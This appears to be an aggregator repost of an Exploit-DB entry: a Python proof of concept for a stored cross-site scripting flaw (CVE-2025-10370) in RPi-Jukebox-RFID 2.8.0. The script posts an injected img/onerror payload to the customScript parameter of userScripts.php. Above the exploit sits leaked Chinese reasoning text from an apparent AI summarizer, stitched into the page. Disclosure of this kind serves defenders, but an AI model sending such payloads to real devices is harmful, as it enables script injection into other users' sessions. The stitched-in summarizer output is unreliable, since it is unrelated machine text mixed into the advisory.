[webapps] RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS)
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户提供的文章是一个关于RPi-Jukebox-RFID 2.8.0版本中存储型XSS漏洞的详细说明,包括漏洞标题、日期、作者、厂商主页、软件链接、版本信息、测试环境和CVE编号。描述部分提到了用户Scripts.php页面中的customScript参数没有正确过滤输入,导致可以注入任意JavaScript代码。还附带了一个利用这个漏洞的Python脚本。 首先,我需要理解文章的主要内容。文章主要揭示了一个XSS漏洞,影响特定版本的软件,并提供了一个利用该漏洞的示例代码。用户的需求是用中文总结内容,不超过100字,并且不需要特定的开头。 接下来,我要确定关键信息:软件名称、版本号、漏洞类型(XSS)、影响范围(customScript参数未正确过滤),以及利用方法(注入JavaScript)。同时,要保持简洁明了。 然后,我需要将这些信息浓缩成一句话或两句话,确保不超过字数限制。例如,“RPi-Jukebox-RFID 2.8.0版本存在存储型XSS漏洞,攻击者可通过customScript参数注入恶意脚本。” 这样既涵盖了软件名称、版本号、漏洞类型和攻击方式。 最后,检查是否符合用户的所有要求:中文总结、100字以内、不使用特定开头。确保没有遗漏关键点,并且表达清晰准确。 </think> RPi-Jukebox-RFID 2.8.0 存在存储型 XSS 漏洞,攻击者可通过 `customScript` 参数注入恶意 JavaScript 代码。 2026-2-2 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:1 收藏

# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370)
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
# Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
# Version: 2.8.0
# Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
# CVE: CVE-2025-10370
#
# Description:
# This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page.
# The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection
# of arbitrary JavaScript payloads.

import requests

# Change this to the actual IP or hostname of the target device
TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php"

# The XSS payload
PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'

# HTTP headers
headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": TARGET,
}

# POST data with the malicious payload
data = {
    "customScript": PAYLOAD
}

def send_exploit():
    print(f"[+] Sending XSS payload to {TARGET}")
    try:
        r = requests.post(TARGET, headers=headers, data=data, timeout=5)
        print(f"[+] Payload sent. Status code: {r.status_code}")
        print("[*] If the target is vulnerable, the payload will execute when the page is rendered.")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    send_exploit()
            

文章来源: https://www.exploit-db.com/exploits/52470
如有侵权请联系:admin#unsafe.sh